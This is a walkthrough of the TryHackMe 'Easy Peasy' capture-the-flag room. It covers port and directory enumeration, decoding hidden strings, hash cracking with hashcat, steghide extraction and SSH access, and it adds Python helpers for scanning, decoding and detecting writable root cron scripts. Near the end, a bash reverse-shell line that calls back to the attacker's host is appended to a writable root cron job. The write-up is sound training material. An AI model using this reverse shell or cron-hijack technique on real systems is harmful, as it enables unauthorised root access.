TryHackMe - Easy Peasy

The room link can be found at TryHackMe - Easy Peasy

Enumeration

First we scan for open ports and services

Nmap

We use nmap with some default arguments.

sudo nmap -sV -sC -oA nmap/first $IP

It returns:

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!

From the first scan we can see that port 80 is open, serving nginx 1.16.1.

All ports

So let's retry against all ports (-p-) in the background, using -v to increase verbosity and dropping the script (-sC) and version (-sV) options so the sweep stays fast.

sudo nmap -v -p- -oA nmap/all $IP

This returns three open ports:

PORT      STATE SERVICE
80/tcp    open  http
6498/tcp  open  unknown
65524/tcp open  unknown

Let's gather more information on those ports by scanning only them:

sudo nmap -sC -sV -oA nmap/ports -p 80,65524,6498 $IP

The output is the following:

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
|   256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_  256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Summing up, we have:

  1. HTTP port 80 with nginx
  2. SSH port 6498 with OpenSSH
  3. HTTP port 65524 with Apache
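The two-stage scan above (fast all-ports sweep, then -sC -sV on just the open ports) is worth scripting so the port list is never retyped by hand. The following is an added example, not part of the original writeup: it parses the normal-output file that -oA writes (nmap/all.nmap) and builds the targeted scan command from it. The sample sweep output is constructed to match this box; running it against a live target assumes nmap is installed and, for SYN scans, that it is run as root (the writeup uses sudo).

```python
"""Two-stage nmap workflow: a full-port sweep, then service/script scan of only
the ports found open. Added example; parses nmap normal output, not the -oG form."""
import os
import re
import subprocess
import sys

# Matches the "PORT STATE SERVICE" rows of nmap's normal output, e.g. "6498/tcp  open  ssh".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)", re.M
)


def parse_open_ports(nmap_output: str, proto: str = "tcp") -> list[int]:
    """Return the ports reported as exactly 'open' (not open|filtered), in file order."""
    return [
        int(m.group("port"))
        for m in PORT_LINE.finditer(nmap_output)
        if m.group("state") == "open" and m.group("proto") == proto
    ]


def service_scan_argv(ip: str, ports: list[int], out_prefix: str = "nmap/ports") -> list[str]:
    """Build the targeted -sC -sV command for the ports found by the sweep."""
    if not ports:
        raise ValueError("no open ports to scan")
    port_spec = ",".join(str(p) for p in sorted(ports))
    return ["nmap", "-sC", "-sV", "-oA", out_prefix, "-p", port_spec, ip]


def run_two_stage(ip: str) -> None:
    """Full workflow; needs nmap and a reachable target, so it is not run offline."""
    os.makedirs("nmap", exist_ok=True)  # -oA does not create the directory itself
    subprocess.run(["nmap", "-v", "-p-", "-oA", "nmap/all", ip], check=True)
    with open("nmap/all.nmap") as fh:
        ports = parse_open_ports(fh.read())
    subprocess.run(service_scan_argv(ip, ports), check=True)


# Constructed sample mimicking the all-ports sweep result on this box.
SAMPLE_SWEEP = """\
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
80/tcp    open  http
6498/tcp  open  unknown
65524/tcp open  unknown
"""

if __name__ == "__main__":
    if len(sys.argv) == 2:
        run_two_stage(sys.argv[1])  # python3 twostage.py $IP
    else:
        # Offline demonstration: show the command the sweep sample would produce.
        print(" ".join(service_scan_argv("10.10.10.10", parse_open_ports(SAMPLE_SWEEP))))
```

Filtering on the exact state "open" matters: a -p- sweep of a firewalled host often reports open|filtered ports, and feeding those into -sC -sV only slows the second stage down.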

Gobuster

While the all-ports scan runs, let's start gobuster to enumerate directories on the nginx server on port 80, using the big.txt wordlist from dirb.

gobuster dir -o gobuster/nginx -w big.txt -u http://$IP/

Gobuster finds a hidden directory:

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/10 13:50:37 Starting gobuster
===============================================================
/hidden (Status: 301)
/robots.txt (Status: 200)
===============================================================
2020/08/10 13:54:18 Finished
===============================================================

Let's also scan the Apache server on port 65524:

gobuster dir -o gobuster/apache -w big.txt -u http://$IP:65524/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP:65524/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/10 13:54:08 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/08/10 13:57:18 Finished
===============================================================

Compromising

The second phase is a bit more confusing and the directions for finding the flags aren't clear, but getting access to the box and escalating privileges is straightforward.

Flag 1

Further enumerating the hidden directory with gobuster, we find another directory called whatever:

gobuster dir -o gobuster/hidden -w big.txt -u http://$IP/hidden/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP/hidden/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/10 14:13:44 Starting gobuster
===============================================================
/whatever (Status: 301)
===============================================================
2020/08/10 14:16:48 Finished
===============================================================

Viewing the page source, there is a hidden <p> element containing a base64-encoded string:

<p hidden>Z____________________Q==</p>

Decoding it gives the first flag:

echo Z____________________Q== | base64 -d

flag{__________}

Flag 2

Using gobuster we found robots.txt on the Apache server; it contains a second User-Agent entry:

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a______________________________0
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

This one isn't well designed: the value in the second User-Agent line is a hash, and the only way to get the flag is to look it up in an online hash database (searching for the hash turns it up on a rather obscure site).

flag{______________}

Flag 3

On the Apache home page we find the third flag:

Fl4g 3 : flag{________________________________}

User Flag

In the source of the Apache main page there is another hidden <p>:

<p hidden>its encoded with ba....:O______________________u</p>

Since it says the string is encoded with some base, we open CyberChef and try a number of base encodings.

With base62 we get something that looks like a hidden directory:

/n0th1ng3ls3m4tt3r

On this page we find a long hash-looking string and an image:

<p>9______________________________________________________________1</p>

The hint points to GOST (hashcat mode 6900, GOST R 34.11-94), so we save the string to hash.txt and crack it with hashcat and the wordlist the room provides:

hashcat -a 0 -m 6900 hash.txt easypeasy.txt

It takes a bit of guessing to see that the cracked password is the steghide passphrase for the image, which lets us extract the embedded data:

steghide extract -sf binarycodepixabay.jpg -p mypasswordforthatjob

The output is a username and a password, the latter encoded as 8-bit binary:

username:b____g
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

Decoding the binary with CyberChef gives the credentials:

username: b____g
password: i__________________________y

These are SSH credentials for the OpenSSH service on port 6498. After logging in we find the user flag:

User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a______________y}

This is ROT13; decoding it gives flag{________________}.
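The three decoding steps in this section (the base62 string in the hidden <p>, the binary password from the steghide output, and the ROT13 user flag) are easy to do in CyberChef but also easy to script, which is useful when the encoding is unknown and you want to try several at once. The block below is an added example, not part of the original writeup or the room: base62 is implemented by hand with CyberChef's default 0-9A-Za-z alphabet (treating the data as one big integer, so leading zero bytes are not preserved), guess_decodings reproduces the "try a bunch of encodings" loop, and every sample input is constructed rather than taken from the box.

```python
"""Decoders for the encodings met on this box: base62 (CyberChef default alphabet),
space-separated 8-bit binary, ROT13, plus a helper that tries several base-N
encodings and keeps the ones that yield printable ASCII. Added example."""
import base64
import binascii
import codecs
import string

# CyberChef "From Base62" default alphabet.
B62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase


def base62_encode(data: bytes) -> str:
    """Big-integer base62; leading zero bytes are dropped (same as CyberChef)."""
    n = int.from_bytes(data, "big")
    if n == 0:
        return B62_ALPHABET[0]
    out = []
    while n:
        n, r = divmod(n, 62)
        out.append(B62_ALPHABET[r])
    return "".join(reversed(out))


def base62_decode(text: str) -> bytes:
    n = 0
    for ch in text:
        n = n * 62 + B62_ALPHABET.index(ch)  # ValueError on characters outside the alphabet
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def binary_to_text(bits: str) -> str:
    """Decode space-separated 8-bit groups ("01101000 01101001") to ASCII."""
    groups = bits.split()
    if any(len(g) != 8 or set(g) - {"0", "1"} for g in groups):
        raise ValueError("expected space-separated 8-bit binary groups")
    return bytes(int(g, 2) for g in groups).decode("ascii")


def rot13(text: str) -> str:
    return codecs.decode(text, "rot_13")


def guess_decodings(text: str) -> dict[str, str]:
    """Try common base-N encodings and keep those that decode to printable ASCII.
    Strict decoders (validate=True, exact alphabet) are used so that a wrong base
    fails loudly instead of returning garbage."""
    candidates = {
        "base64": lambda s: base64.b64decode(s, validate=True),
        "base32": lambda s: base64.b32decode(s),
        "base62": lambda s: base62_decode(s),
    }
    hits = {}
    for name, fn in candidates.items():
        try:
            decoded = fn(text).decode("ascii")
        except (ValueError, binascii.Error, UnicodeDecodeError):
            continue
        if decoded and decoded.isprintable():
            hits[name] = decoded
    return hits


if __name__ == "__main__":
    # Constructed inputs, not the room's real values.
    print(guess_decodings(base62_encode(b"/n0th1ng3ls3m4tt3r")))
    print(binary_to_text("01101000 01101001"))
    print(rot13("synt{grfg}"))
```

The printable-ASCII filter is what makes the guessing loop practical: a wrong base usually either fails to decode at all or produces bytes outside the printable range, so only the right candidate survives.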

Root Flag

Uploading LinPEAS to the box, we find a cron job that runs as root every minute and executes the script /var/www/.mysecretcronjob.sh:

* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

Since we can write to that script, appending a bash reverse shell to it gets us a root shell:

bash -i >& /dev/tcp/$USER_IP/9000 0>&1

Open a listener and wait for the job to fire (at most a minute):

nc -lvnp 9000

The root flag is in /root/.root.txt:

flag{________________________________}
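The condition LinPEAS reported here, a root cron job whose script a low-privileged user can modify, is easy to check for by hand on any Linux box, and the same check is what a defender should run before signing off a crontab. The following is an added example, not part of the original writeup or of LinPEAS: it parses system-crontab format (/etc/crontab and /etc/cron.d/*), resolves a leading "cd DIR &&" the way the job above uses it, and reports the scripts the current user could overwrite (or create, if the script is missing but its directory is writable). The sample crontab is constructed; @reboot-style shortcuts are not handled.

```python
"""Find root cron jobs whose script the current user can modify. Added example."""
import glob
import os
import shlex
import tempfile


def root_cron_scripts(crontab_text: str) -> list[str]:
    """Return absolute paths of *.sh scripts executed by root's cron entries."""
    scripts = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank lines, comments and VAR=value settings
        fields = line.split(None, 6)  # min hour dom mon dow user command
        if len(fields) < 7 or fields[5] != "root":
            continue
        cwd = "/"
        tokens = shlex.split(fields[6])
        for i, tok in enumerate(tokens):
            if tok == "cd" and i + 1 < len(tokens):
                cwd = tokens[i + 1]  # e.g. "cd /var/www/ && sudo bash .mysecretcronjob.sh"
            elif tok.endswith(".sh"):
                scripts.append(tok if tok.startswith("/") else os.path.join(cwd, tok))
    return scripts


def writable_by_me(paths: list[str]) -> list[str]:
    """Keep scripts the current user can overwrite, or create if missing but in a
    directory we can write to; either lets us run code as root on the next tick."""
    hits = []
    for p in paths:
        target = p if os.path.exists(p) else os.path.dirname(p)
        if os.access(target, os.W_OK):
            hits.append(p)
    return hits


# Constructed sample in /etc/crontab format, including the job from this box.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh
0 3     * * *   backup  /home/backup/rotate.sh
"""


def demo_writable_detection() -> bool:
    """Create a writable script in a temp dir, point a root cron line at it and
    confirm the check flags it, i.e. the situation LinPEAS reported on this box."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "job.sh")
        open(script, "w").close()
        text = f"* * * * * root bash {script}\n"
        return writable_by_me(root_cron_scripts(text)) == [script]


if __name__ == "__main__":
    for f in ["/etc/crontab"] + glob.glob("/etc/cron.d/*"):
        try:
            with open(f) as fh:
                text = fh.read()
        except OSError:
            continue
        for s in writable_by_me(root_cron_scripts(text)):
            print(f"{f}: root runs {s}, which you can modify")
```

The defensive fix is the mirror image of the check: anything root's cron executes should be owned by root, not group- or world-writable, and sit in a root-owned directory, since a writable parent directory lets an attacker replace the script even when the file itself is protected.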